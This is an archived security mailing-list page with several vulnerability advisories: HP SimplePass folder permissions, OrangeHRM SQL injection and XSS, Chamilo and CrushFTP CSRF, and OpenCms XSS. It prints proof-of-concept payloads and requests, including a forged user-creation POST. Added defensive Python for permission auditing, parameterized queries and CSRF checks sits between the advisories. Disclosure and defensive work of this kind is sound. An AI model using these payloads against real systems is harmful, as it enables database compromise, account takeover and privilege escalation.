[FD] HP SimplePass Local Privilege Escalation

2017-05-22 Thread Rehan Ahmed

# Vulnerability Title: HP SimplePass Local Privilege Escalation
# Advisory Release Date: 05/18/2017
# Credit: Discovered By Rehan Ahmed
# Contact: knight_re...@hotmail.com
# Severity Level: Medium
# Type: Local
# Tested Platform: Windows 8 & 10 x64
# Vendor: HP Inc.
# Vendor Site: http://www.hp.com
# Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe
# Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46 
# Vendor Contacted: 04/03/2017
# Vendor Response: 5/18/2017


Summary:

HP SimplePass allows you to safely store logon information for your favorite 
websites, and use a single method of authentication for your password-protected 
website accounts. Choose a fingerprint, password or PIN to authenticate your 
identity. Your computer must have at least one password-protected Windows User 
Account to use HP SimplePass.

https://support.hp.com/us-en/document/c03653209

Issue Details:

HP SimplePass is prone to a local privilege-escalation vulnerability due to 
insecure file system permissions granted during installation. A local adversary 
can exploit this issue to gain elevated privileges on the affected system.
HP SimplePass installs by default to "C:\Program Files\Hewlett-Packard\SimplePass" 
with very weak folder permissions, granting any user full permission to the 
contents of the directory and its subfolders. This allows ample opportunity for 
code execution against any other user running the application. HP SimplePass 
has a few binaries that are typically configured as a service or startup 
program, which makes this particularly easy to leverage.
 
Proof of Concept

a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass"

C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(M)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)


b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i "HP SimplePass"

HP SimplePass Cachedrv Service   Cachedrv server   "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"   Auto
HP SimplePass Service    omniserv   C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe   Auto

A user can place a malicious DLL/EXE file with one of the expected names (e.g. 
OmniServ.exe) into that directory and wait until the service is restarted. The 
service cannot be restarted by normal users, but an attacker could simply reboot 
the system or wait for the next reboot to happen.

3) Mitigation:

Change the directory permissions so that groups other than Administrators have 
only Read/Execute.
Fix: 
https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306
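As an added defensive check that is not part of the advisory, the following Python parses `icacls` output for a service's install directory and flags every entry that gives a low-privileged principal write access, which is exactly the condition abused above; it then produces the `icacls` commands matching the stated mitigation (non-admin groups reduced to Read/Execute). The first sample listing is the advisory's own output re-wrapped; the hardened listing, the list of low-privileged principals, the write-capable rights table and the remediation commands are my assumptions, and the commands should be reviewed against the host's inheritance layout before they are run.

```python
import re
from dataclasses import dataclass, field

# Principals that every local, non-administrative user belongs to (assumption).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "users",
    "builtin\\users",
    "authenticated users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls simple rights that allow changing directory contents.
SIMPLE_WRITE_RIGHTS = {"F", "M", "W", "D"}
# icacls specific rights that allow creating, replacing or deleting files.
SPECIFIC_WRITE_RIGHTS = {"WD", "AD", "WEA", "DC", "WA", "DE", "WDAC", "WO", "GW", "GA"}
INHERITANCE_TOKENS = {"I", "OI", "CI", "IO", "NP"}

SAMPLE_PATH = r"C:\Program Files\Hewlett-Packard\SimplePass"

# Constructed from the advisory's icacls output (line wrapping restored).
SAMPLE_ICACLS = r"""C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(M)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
"""

# Constructed listing of what the directory should look like after the fix.
HARDENED_ICACLS = r"""C:\Program Files\Hewlett-Packard\SimplePass BUILTIN\Administrators:(OI)(CI)(F)
                                            NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                            BUILTIN\Users:(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
"""


@dataclass
class Ace:
    principal: str
    inheritance: set = field(default_factory=set)
    rights: set = field(default_factory=set)


def parse_icacls(output, path):
    """Parse the text printed by `icacls <path>` into a list of Ace records."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        # The first ACE is printed on the same line as the path itself.
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = re.match(r"^(.+?):((?:\([^)]*\))+)$", line)
        if not m:
            continue  # skips the "Successfully processed ..." summary line
        ace = Ace(m.group(1))
        for token in re.findall(r"\(([^)]*)\)", m.group(2)):
            if token in INHERITANCE_TOKENS:
                ace.inheritance.add(token)
            else:
                ace.rights.update(t.strip() for t in token.split(","))
        aces.append(ace)
    return aces


def is_writable(rights):
    """True if the right set lets the holder add, replace or delete files."""
    return bool(rights & SIMPLE_WRITE_RIGHTS) or bool(rights & SPECIFIC_WRITE_RIGHTS)


def audit(output, path):
    """Return the ACEs that give a low-privileged principal write access."""
    return [
        {"principal": a.principal, "rights": sorted(a.rights),
         "inheritance": sorted(a.inheritance)}
        for a in parse_icacls(output, path)
        if a.principal.lower() in LOW_PRIV_PRINCIPALS and is_writable(a.rights)
    ]


def remediation_commands(path, findings):
    """icacls commands following the advisory's fix: non-admin groups get RX only."""
    cmds = []
    if any("I" in f["inheritance"] for f in findings):
        # Inherited ACEs cannot be removed until they are converted to explicit ones.
        cmds.append(f'icacls "{path}" /inheritance:d')
    for principal in dict.fromkeys(f["principal"] for f in findings):
        cmds.append(f'icacls "{path}" /remove:g "{principal}"')
    cmds.append(f'icacls "{path}" /grant:r "BUILTIN\\Users:(OI)(CI)RX"')
    return cmds


if __name__ == "__main__":
    findings = audit(SAMPLE_ICACLS, SAMPLE_PATH)
    for f in findings:
        print("WEAK:", f["principal"], f["rights"], f["inheritance"])
    for cmd in remediation_commands(SAMPLE_PATH, findings):
        print(cmd)
    print("hardened listing findings:", audit(HARDENED_ICACLS, SAMPLE_PATH))
```

On the advisory's listing the audit flags four entries: both `Everyone:(F)` ACEs and both `Authenticated Users:(M)` ACEs, while the `BUILTIN\Users` entries (RX and GR,GE) pass. The inherit-only `(IO)` entries are reported as well, because they are what a newly dropped `OmniServ.exe` would inherit. The same parser can be pointed at any directory named in a `wmic service get pathname` listing to check service binaries beyond SimplePass.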



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] OrangeHRM Blind SQL Injection & XSS Vulnerabilities

2015-04-11 Thread Rehan Ahmed
I. Overview 
 
OrangeHRM (Opensource 3.2.1, Professional & Enterprise 4.11) is prone to 
multiple Blind SQL injection & XSS vulnerabilities. These vulnerabilities 
allow an attacker to inject SQL commands to compromise the affected database 
management system behind the HRM, perform operations on behalf of the affected 
victim, redirect them to malicious sites, steal their credentials, and more. 

II. Severity 
 
Rating: High 
Remote: Yes 
Authentication Required: Yes 
CVE-ID: 

III. Vendor's Description of Application 
 

OrangeHRM Solutions

Effective HR tools and options to suit your needs Start-up, SME, global 
enterprises, whichever one you may be, OrangeHRM offers you flexibility and 
freedom to select from free and paid versions of OrangeHRM backed with 
specialized expertise. Our HR modules cover many major human capital management 
extents. OrangeHRM is used by millions of users around the world in all 
industries. Explore our solutions and contact our consultants to assist you 
with your selection process.

http://www.orangehrm.com/


IV. Vulnerability Details & Exploit 
 
1) Blind SQL Injection 


Request Method = GET

a) 
/symfony/web/index.php/leave/getFilteredEmployeeCountAjax?location=-1)+or+(31337=31337)+and+(20=20&subunit=0

Request Method = POST

b) /symfony/web/index.php/recruitment/viewCandidates
   sortField=[BSQLi]

__ 

2) Multiple Reflected XSS 

Request Method = GET 

a) /symfony/web/index.php/admin/saveJobTitle?jobTitleId=1';+confirm(0);+// 

Request Method = POST

b) /symfony/web/index.php/performance/saveReview  
  saveReview360Form[reviewId] = [XSS Payload]  
  saveReview = [XSS Payload] 


VI. Affected Systems 
 
Software: OrangeHRM 
Version:  OrangeHRM Opensource 3.2.1 or prior
   OrangeHRM Professional & Enterprise 4.11 or prior
Solution (Fix): No

VII. Vendor Response/Solution 
 
Vendor Contacted : 02/12/2015 
Vendor Response : 02/12/2015 
Shared Technical Details/Poc : 02/13/2015
Again Vendor Contacted : 03/04/2015
Vendor Response: No Response
Advisory Release : 04/10/2015

VIII. Credits 
======== 
Discovered by Rehan Ahmed 
knight_re...@hotmail.com  
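To show why the `location` payload in item 1a works and what a fix looks like, here is an added example that is not OrangeHRM's code: the `employee` table and the shape of the count query are assumptions. The vulnerable handler pastes the request parameter into the SQL text, so the injected `-1) or (31337=31337) and (20=20` (the advisory's payload, URL-decoded) keeps the parentheses balanced and turns the returned count into a true/false oracle; the hardened handler enforces the expected integer type and binds values as parameters, and a small regression check confirms the oracle is gone.

```python
import sqlite3

# Constructed stand-in table; the real OrangeHRM schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employee (id INTEGER PRIMARY KEY, "
                 "location_id INTEGER, subunit_id INTEGER)")
    conn.executemany("INSERT INTO employee (location_id, subunit_id) VALUES (?, ?)",
                     [(1, 0), (1, 0), (2, 0), (2, 5)])
    return conn


# The advisory's payloads with '+' decoded to spaces; the second one flips the
# injected condition to false so the two responses can be compared.
TRUE_PAYLOAD = "-1) or (31337=31337) and (20=20"
FALSE_PAYLOAD = "-1) or (31337=31338) and (20=20"


def count_vulnerable(conn, location, subunit):
    # Vulnerable pattern (assumed query shape): request values are pasted into
    # the SQL text, so the payload rewrites the WHERE clause. With the payload
    # the clause becomes
    #   (location_id = -1) or (31337=31337) and (20=20) AND subunit_id = 0
    # which is still syntactically valid.
    sql = ("SELECT COUNT(*) FROM employee "
           f"WHERE (location_id = {location}) AND subunit_id = {subunit}")
    return conn.execute(sql).fetchone()[0]


def count_safe(conn, location, subunit):
    # Hardened: enforce the expected type (ValueError on anything that is not
    # an integer), then bind the values so the database never parses them as SQL.
    loc, sub = int(location), int(subunit)
    sql = "SELECT COUNT(*) FROM employee WHERE (location_id = ?) AND subunit_id = ?"
    return conn.execute(sql, (loc, sub)).fetchone()[0]


def blind_oracle_leaks(fn, conn):
    """Regression check: does fn answer differently to a true and a false
    injected condition? A hardened handler must not (here it raises instead)."""
    try:
        return fn(conn, TRUE_PAYLOAD, "0") != fn(conn, FALSE_PAYLOAD, "0")
    except ValueError:
        return False


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, benign location=-1 :", count_vulnerable(conn, "-1", "0"))
    print("vulnerable, true condition     :", count_vulnerable(conn, TRUE_PAYLOAD, "0"))
    print("vulnerable, false condition    :", count_vulnerable(conn, FALSE_PAYLOAD, "0"))
    print("oracle leaks (vulnerable)      :", blind_oracle_leaks(count_vulnerable, conn))
    print("oracle leaks (safe)            :", blind_oracle_leaks(count_safe, conn))
```

With the constructed rows the benign request for location `-1` returns 0, the true-condition payload returns 3 (every row in subunit 0, because `AND` binds tighter than `OR`) and the false-condition payload returns 0 again; that difference is the blind oracle. The parameterized handler answers 2 for a legitimate `location=1`, and refuses the payloads outright.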



[FD] Chamilo LMS 1.9.10 Multiple XSS & CSRF Vulnerabilities

2015-03-18 Thread Rehan Ahmed
=2&month_start=3&year_start=2015&end_limit=on&day_end=2&month_end=3&year_end=2016&session_visibility=2

CSRF PoC:-

[HTML form not preserved in this archive; it submitted to 
http://127.0.0.1/main/admin/session_add.php with method="POST"]

VI. Affected Systems 
 
Software: Chamilo LMS 
Version: 1.9.10 and Prior
Solution (Fix): Upgrade to 1.9.11 (https://github.com/chamilo/chamilo-lms/)

VII. Vendor Response/Solution 
==== 
Vendor Contacted : 02/12/2015 
Vendor Response : 02/12/2015 
Patch Release: 03/17/2015 
Advisory Release: 03/18/2015

VIII. Credits 
 
Discovered by Rehan Ahmed 
knight_re...@hotmail.com  



[FD] Alkacon OpenCms 9.5.1 Multiple XSS Vulnerabilities

2015-03-12 Thread Rehan Ahmed
Product: OpenCms
Vendor: Alkacon Software
Vulnerable Version(s): 9.5.1 and probably prior
Tested Version: 9.5.1
Vendor Notification: Mar 05, 2015 
(https://github.com/alkacon/opencms-core/issues/304)
Vendor Patch: Not Yet (No Specific Time-line)
Public Disclosure: Mar 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: 
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Not Yet (https://github.com/alkacon/opencms-core/)
Discovered and Credits: Rehan Ahmed (knight_re...@hotmail.com)

___
Overview
___

Alkacon OpenCms 9.5.1 and prior versions are prone to multiple cross-site 
scripting vulnerabilities because they fail to sufficiently sanitize 
user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the 
browser of an unsuspecting user in the context of the affected site.
This may allow the attacker to steal cookie-based authentication credentials 
and to launch other attacks.
___
Vendor's Description of Application
___

OpenCms from Alkacon Software is a professional, easy to use website content 
management system. OpenCms helps content managers worldwide to create and 
maintain beautiful websites fast and efficiently.
The fully browser based user interface features configurable editors for 
structured content with well defined fields. Alternatively, content can be 
created using an integrated WYSIWYG editor similar to well known office 
applications. A sophisticated template engine enforces a site-wide corporate 
layout and W3C standard compliance for all content.
OpenCms is based on Java and XML technology. It can be deployed in an open 
source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial 
components (e.g. Windows NT, IIS, BEA Weblogic, Oracle).
As true open source software, OpenCms is free of licensing costs.

http://www.opencms.org/en/index.html
___
Vulnerability Details & Exploit
___

Method: GET

/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE

[FD] Crushftp 7.2.0 - Multiple CSRF & XSS Vulnerabilities

2015-02-18 Thread Rehan Ahmed

I. Overview

Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified 
in Crushftp 7.2.0 (Web Interface) on the default configuration. These 
vulnerabilities allow an attacker to gain control over valid user accounts, 
perform operations on their behalf, redirect them to malicious sites, steal 
their credentials, and more.

II. Severity

Rating: Medium
Remote: Yes
Authentication Required: Yes

III. Vendor's Description of Application
 
CrushFTP is a robust file transfer server that makes it easy to setup secure 
connections with your users.
'Crush' comes from the built-in zip methods in CrushFTP. They allow for 
downloading files in compressed formats in-stream, or even automatically 
expanding zip files as they are received in-stream. This is called ZipStreaming 
and can greatly accelerate the transfer of many types of files.
Secure management is web based allowing you the ability to manage and monitor 
the server from anywhere, or with almost any device. Easy in place server 
upgrades without complicated installers. Runs as a daemon, or Windows service 
with no need for a local GUI.
CrushFTP is watching out for you by detecting common hack attempts and robots 
which scan for weak passwords. It will automatically protect you against DDoS 
attacks. No need for you to do anything as CrushFTP will automatically ban these 
IPs to prevent wasted logging and CPU usage. This keeps your server secure from 
unwanted abuse.
User management includes inheritance, groups, and virtual file systems. If you 
want simple user management, it can be as easy as just making a folder with a 
specific name and nothing else.
Think about how easily you can delegate user administration with CrushFTP's 
role based administration and event configuration.
http://www.crushftp.com/index.html

 
IV. Vulnerability Details & Exploit


1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) 

a) An attacker may add/delete/modify user's accounts 
b) May change all configuration settings 

Request Method: POST
Location: /WebInterface/function/

Proof of Concept:- 

[HTML form not preserved in this archive; it submitted a POST to 
/WebInterface/function/]


2) Multiple Cross-Site Scripting (Web Interface - Default Config)

Type: Reflected
Request Method: POST 
Location: /WebInterface/function/ 
Parameter: vfs_items
Values:  
vfs_items =  


Proof of Concept:

POST /WebInterface/function/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html
Content-Length: 656
Cookie: X
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E


Type: Reflected
Request Method: GET 
Location: /WebInterface/function/ 
Parameter: path
Values:   
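The CSRF issues on this page (Chamilo's `session_add.php` and the CrushFTP management functions such as `command=setUserItem`) exist because the server accepts a state-changing POST on the strength of the session cookie alone, and the victim's browser attaches that cookie to a form submitted from any site. This added example is not Chamilo's or CrushFTP's code: the request dictionaries, the header names, the `csrf_token` field and the site origin are assumptions. It implements the two standard server-side checks, a per-session synchronizer token and an Origin/Referer check, and runs a legitimate request and a forged one (what the stripped PoC form would produce) through them.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Assumed origin of the management UI (the PoC request uses 127.0.0.1:8080).
SITE_ORIGIN = "http://127.0.0.1:8080"


def issue_token(session_id, secret):
    """Synchronizer token: a random nonce plus an HMAC binding it to the
    session, so a token captured from one session is useless in another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{nonce}:{session_id}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_valid(token, session_id, secret):
    """Recompute the HMAC for this session and compare in constant time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(secret, f"{nonce}:{session_id}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def origin_allowed(headers):
    """Independent second check: browsers send Origin (or at least Referer) on
    cross-site form posts and it must name our own site; absent means reject."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlparse(src)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN


def accept_state_change(request, session_id, secret):
    """Gate for a state-changing POST. The session cookie alone proves
    nothing here, because the browser attaches it to forged posts as well."""
    return (request["method"] == "POST"
            and origin_allowed(request["headers"])
            and token_valid(request["form"].get("csrf_token"), session_id, secret))


# Constructed requests for the two cases.
def legitimate_request(token):
    return {"method": "POST",
            "headers": {"Origin": SITE_ORIGIN, "Cookie": "X"},
            "form": {"command": "setUserItem", "username": "test", "csrf_token": token}}


def forged_request():
    # What a PoC form hosted on another site produces: the victim's browser
    # still adds the cookie, but the page can neither read nor forge the token.
    return {"method": "POST",
            "headers": {"Origin": "http://attacker.example", "Cookie": "X"},
            "form": {"command": "setUserItem", "username": "test"}}


if __name__ == "__main__":
    secret = b"constructed-server-secret"
    token = issue_token("sess-A", secret)
    print("legitimate:", accept_state_change(legitimate_request(token), "sess-A", secret))
    print("forged    :", accept_state_change(forged_request(), "sess-A", secret))
```

Either check on its own would already block the forged request; keeping both means a lost Origin header (some proxies strip it) does not silently disable protection, and a leaked token still fails the origin test. The token is tied to the session id, not stored server-side, so nothing about the approach assumes a particular framework.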
